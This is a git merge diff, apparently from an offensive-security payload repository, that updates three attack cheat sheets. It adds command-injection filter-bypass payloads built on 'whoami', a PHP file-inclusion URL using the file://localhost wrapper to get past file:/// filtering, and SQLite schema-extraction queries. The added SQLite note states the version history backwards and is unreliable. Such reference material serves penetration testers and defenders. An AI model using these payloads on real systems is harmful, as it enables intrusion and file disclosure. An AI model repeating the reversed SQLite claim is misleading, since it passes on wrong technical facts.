Merge d658aa026a into 80dda8beeb

Merge pull request #710 from mohnad-0b/patch-1
Update SQLite Injection.md
2024-05-09 11:46:14 +02:00 · 2024-04-03 22:43:59 +03:00 · 2024-04-03 18:15:31 +02:00 · 2024-04-03 18:15:03 +02:00 · 2024-04-01 20:46:09 +03:00 · 2024-03-09 21:46:33 +05:30
3 changed files with 22 additions and 2 deletions
--- a/Injection/README.md
+++ b/Injection/README.md
@ -18,6 +18,7 @@
  * [Bypass blacklisted words](#bypass-blacklisted-words)
   * [Bypass with single quote](#bypass-with-single-quote)
   * [Bypass with double quote](#bypass-with-double-quote)
+   * [Bypass with backticks](#bypass-with-backticks)
   * [Bypass with backslash and slash](#bypass-with-backslash-and-slash)
   * [Bypass with $@](#bypass-with-)
   * [Bypass with $()](#bypass-with--1)
@ -245,12 +246,20 @@ root:x:0:0:root:/root:/bin/bash

 ```powershell
 w'h'o'am'i
+wh''oami
 ```

 #### Bypass with double quote

 ```powershell
 w"h"o"am"i
+wh""oami
+```
+
+#### Bypass with backticks
+
+```powershell
+wh``oami
 ```

 #### Bypass with backslash and slash
--- a/Inclusion/README.md
+++ b/Inclusion/README.md
@ -151,6 +151,14 @@ When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still pos

 ## LFI / RFI using wrappers

+### Wrapper file://
+It is possible to use the [`file://`]([url](https://www.php.net/manual/en/wrappers.file.php)) wrapper in order to read file inside allowed paths (if `open_basedir` restriction in effect).
+
+```shell
+http://example.com/index.php?filename=file://localhost/var/www/html/secured_extranet/panel/security.php
+```
+Note that using `localhost` above bypasses `file:///` filtering.
+
 ### Wrapper php://filter

 The part "`php://filter`" is case insensitive
@ -623,4 +631,4 @@ If SSH is active check which user is being used `/proc/self/status` and `/etc/pa
 * [PHP FILTERS CHAIN: WHAT IS IT AND HOW TO USE IT - Rémi Matasse - 18/10/2022](https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html)
 * [PHP FILTER CHAINS: FILE READ FROM ERROR-BASED ORACLE - Rémi Matasse - 21/03/2023](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html)
 * [One Line PHP: From Genesis to Ragnarök - Ginoah, Bookgin](https://hackmd.io/@ginoah/phpInclude#/)
-* [Introducing wrapwrap: using PHP filters to wrap a file with a prefix and suffix - Charles Fol - 11 December, 2023](https://www.ambionics.io/blog/wrapwrap-php-filters-suffix)
+* [Introducing wrapwrap: using PHP filters to wrap a file with a prefix and suffix - Charles Fol - 11 December, 2023](https://www.ambionics.io/blog/wrapwrap-php-filters-suffix)
--- a/Injection/SQLite
+++ b/Injection/SQLite
@ -33,7 +33,10 @@ select sqlite_version();
 ```sql
 SELECT sql FROM sqlite_schema
 ```
-
+if sqlite_version > 3.33.0 
+```sql
+SELECT sql FROM sqlite_master
+```
 ## Integer/String based - Extract table name

 ```sql
Author	SHA1	Message	Date
n3rada	6145d1a987	Merge `d658aa026a` into `80dda8beeb`	2024-04-03 22:43:59 +03:00
Swissky	80dda8beeb	Merge pull request #710 from mohnad-0b/patch-1 Update SQLite Injection.md	2024-04-03 18:15:31 +02:00
Swissky	8ef458db2a	Merge pull request #708 from xplo1t-sec/master bypass techniques added	2024-04-03 18:15:03 +02:00
mohnad banat	d834abe43c	Update SQLite Injection.md Since sqlite version 3.33.0, sqlite_schema has been replaced by sqlite_master.	2024-04-01 20:46:09 +03:00
xplo1t-sec	033982dc30	bypass techniques added	2024-03-09 21:46:33 +05:30
n3rada	d658aa026a	Adding `file://` wrapper	2024-02-24 19:52:40 +01:00